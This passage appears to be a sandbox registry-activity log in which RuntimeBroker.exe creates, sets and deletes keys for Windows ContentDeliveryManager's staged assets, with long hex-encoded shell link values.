660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45a59052000373030613434353831356266343633366235646637343263353438663862346134623833333964646233663534646530303232373465376563613831373463650000b20009000400efbeb45a5905b45a59052e000000000000000000000000000000000000000000000000009b1ba800370030003000610034003400350038003100350062006600340036003300360062003500640066003700340032006300350034003800660038006200340061003400620038003300330039006400640062003300660035003400640065003000300032003200370034006500370065006300610038003100370034006300650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001ba978ef1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37303061343435383135626634363336623564663734326335343866386234613462383333396464623366353464653030323237346537656361383137346365000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c7a676f6e62746a0000000000000000d07758bc69233b4ea7ba0bbf192db87835a5c5e16c27f011a617f2717f61ef81d07758bc69233b4ea7ba0bbf192db87835a5c5e16c27f011a617f2717f61ef81d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900350031003900380036003300350038002d0034003000300036003900310039003800340030002d0031003000300039003600390030003800340032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000007c15f888000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f11c7c-3c99-47aa = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000db09591c20c9db01db09591c20c9db01db09591c20c9db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45a59052000376630353262366234663631323432363161653639613266383739303561393062323331656239323961383063306631373064396432346234343361663134380000b20009000400efbeb45a5905b45a59052e000000000000000000000000000000000000000000000000002557a300370066003000350032006200360062003400660036003100320034003200360031006100650036003900610032006600380037003900300035006100390030006200320033003100650062003900320039006100380030006300300066003100370030006400390064003200340062003400340033006100660031003400380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001ba978ef1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37663035326236623466363132343236316165363961326638373930356139306232333165623932396138306330663137306439643234623434336166313438000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c7a676f6e62746a0000000000000000d07758bc69233b4ea7ba0bbf192db87836a5c5e16c27f011a617f2717f61ef81d07758bc69233b4ea7ba0bbf192db87836a5c5e16c27f011a617f2717f61ef81d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900350031003900380036003300350038002d0034003000300036003900310039003800340030002d0031003000300039003600390030003800340032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000007c15f888000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a0758fc9-3119-48de = d4f0711c20c9db01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\209b8066-ed4f-494f = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c688f9-88ee-4678 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5faf247-5257-402c = "\\\\?\\Volume{88F8157C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\d9b2767360708420e74d29e3d125ef9b042b19fbb3ab038528a08c810e868c1a" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5faf247-5257-402c = da38551d20c9db01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a0758fc9-3119-48de = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a0758fc9-3119-48de = "\\\\?\\Volume{88F8157C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\54c7f247c0aee772de6bf16892db7664772fff5879be3ea682c70452bc83ef2c" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc75472c-0f5a-47b9 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\430d0482-62a8-4622 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc75472c-0f5a-47b9 = 5279671c20c9db01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc75472c-0f5a-47b9 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc75472c-0f5a-47b9 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c92eb376-4e5d-410f = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000a41b8b1c20c9db01383b4c1d20c9db01383b4c1d20c9db01ca430a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45a59052000373030613434353831356266343633366235646637343263353438663862346134623833333964646233663534646530303232373465376563613831373463650000b20009000400efbeb45a5905b45a59052e000000000000000000000000000000000000000000000000009b1ba800370030003000610034003400350038003100350062006600340036003300360062003500640066003700340032006300350034003800660038006200340061003400620038003300330039006400640062003300660035003400640065003000300032003200370034006500370065006300610038003100370034006300650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001ba978ef1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37303061343435383135626634363336623564663734326335343866386234613462383333396464623366353464653030323237346537656361383137346365000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c7a676f6e62746a0000000000000000d07758bc69233b4ea7ba0bbf192db8783da5c5e16c27f011a617f2717f61ef81d07758bc69233b4ea7ba0bbf192db8783da5c5e16c27f011a617f2717f61ef81d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900350031003900380036003300350038002d0034003000300036003900310039003800340030002d0031003000300039003600390030003800340032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000007c15f888000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\209b8066-ed4f-494f C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\209b8066-ed4f-494f = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000beb7a71c20c9db01b515071d20c9db01b515071d20c9db01573e0a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45a59052000353463376632343763306165653737326465366266313638393264623736363437373266666635383739626533656136383263373034353262633833656632630000b20009000400efbeb45a5905b45a59052e000000000000000000000000000000000000000000000000006e089500350034006300370066003200340037006300300061006500650037003700320064006500360062006600310036003800390032006400620037003600360034003700370032006600660066003500380037003900620065003300650061003600380032006300370030003400350032006200630038003300650066003200630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001ba978ef1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c35346337663234376330616565373732646536626631363839326462373636343737326666663538373962653365613638326337303435326263383365663263000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c7a676f6e62746a0000000000000000d07758bc69233b4ea7ba0bbf192db8783aa5c5e16c27f011a617f2717f61ef81d07758bc69233b4ea7ba0bbf192db8783aa5c5e16c27f011a617f2717f61ef81d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900350031003900380036003300350038002d0034003000300036003900310039003800340030002d0031003000300039003600390030003800340032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000007c15f888000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c688f9-88ee-4678 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5faf247-5257-402c = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\430d0482-62a8-4622 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\430d0482-62a8-4622 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc75472c-0f5a-47b9 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\209b8066-ed4f-494f = 59f1241d20c9db01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5faf247-5257-402c = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c92eb376-4e5d-410f C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f11c7c-3c99-47aa C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f11c7c-3c99-47aa = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a0758fc9-3119-48de = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000009258671c20c9db019258671c20c9db019258671c20c9db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45a59052000353463376632343763306165653737326465366266313638393264623736363437373266666635383739626533656136383263373034353262633833656632630000b20009000400efbeb45a5905b45a59052e000000000000000000000000000000000000000000000000006e089500350034006300370066003200340037006300300061006500650037003700320064006500360062006600310036003800390032006400620037003600360034003700370032006600660066003500380037003900620065003300650061003600380032006300370030003400350032006200630038003300650066003200630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001ba978ef1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c35346337663234376330616565373732646536626631363839326462373636343737326666663538373962653365613638326337303435326263383365663263000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c7a676f6e62746a0000000000000000d07758bc69233b4ea7ba0bbf192db87838a5c5e16c27f011a617f2717f61ef81d07758bc69233b4ea7ba0bbf192db87838a5c5e16c27f011a617f2717f61ef81d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900350031003900380036003300350038002d0034003000300036003900310039003800340030002d0031003000300039003600390030003800340032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000007c15f888000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\209b8066-ed4f-494f C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c688f9-88ee-4678 = "\\\\?\\Volume{88F8157C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7f052b6b4f6124261ae69a2f87905a90b231eb929a80c0f170d9d24b443af148" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c92eb376-4e5d-410f C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\430d0482-62a8-4622 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f11c7c-3c99-47aa = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f11c7c-3c99-47aa = "\\\\?\\Volume{88F8157C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7f052b6b4f6124261ae69a2f87905a90b231eb929a80c0f170d9d24b443af148" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc75472c-0f5a-47b9 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a0758fc9-3119-48de C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c688f9-88ee-4678 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System C:\Windows\System32\RuntimeBroker.exe N/A
